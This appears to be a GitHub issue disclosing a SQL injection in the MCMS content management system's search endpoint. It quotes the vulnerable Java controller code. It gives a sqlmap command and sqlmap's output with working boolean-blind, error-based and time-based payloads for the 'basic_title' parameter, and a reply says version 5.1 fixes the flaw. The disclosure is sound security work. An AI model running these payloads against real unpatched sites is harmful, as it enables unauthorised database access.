search has SQL injection vulnerability

[x00er]

Where SQL injection vulnerability code appears

@RequestMapping(value = "/{searchId}/search")
@responsebody
public void search(HttpServletRequest request, @PathVariable int searchId, HttpServletResponse response) {
SearchEntity _search = new SearchEntity();
_search.setAppId(BasicUtil.getAppId());
_search.setSearchId(searchId);
// 获取对应搜索模型
SearchEntity search = (SearchEntity) searchBiz.getEntity(_search);
//判断当前搜索是否有模板文件
if (ObjectUtil.isNull(search)) {
this.outJson(response, false);
}
Map<String, Object> map = new HashMap<>();
// 读取请求字段
Map<String, String[]> field = request.getParameterMap();
//TODO
Map<String, String> basicField = getMapByProperties(net.mingsoft.mdiy.constant.Const.BASIC_FIELD);
// 文章字段集合
Map<String, Object> articleFieldName = new HashMap<String, Object>();
// 自定义字段集合
Map<String, String> diyFieldName = new HashMap<String, String>();

Parameter 'basic_title' is not filtered and controllable

Payload
HTTP request URL address "http://localhost:8080/ms-mcms/cms/1/search.do"

use sqlmap to test:
python sqlmap.py -u http://localhost:8080/ms-mcms/cms/1/search.do --data basic_title=q --level 3
the result is:
sqlmap identified the following injection point(s) with a total of 385 HTTP(s) requests:

Parameter: basic_title (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: basic_title=q') AND 3749=(SELECT (CASE WHEN (3749=3749) THEN 3749 ELSE (SELECT 7782 UNION SELECT 6107) END))-- ZskZ

Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: basic_title=q') AND EXTRACTVALUE(9263,CONCAT(0x5c,0x716b627871,(SELECT (ELT(9263=9263,1))),0x71786b7a71)) AND ('nLqp'='nLqp

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (comment)
Payload: basic_title=q') OR SLEEP(5)#

Ask the author to fix this vulnerability.Thanks.

[d1227731421]

Use mcms 5.1 version, the official has solved the problem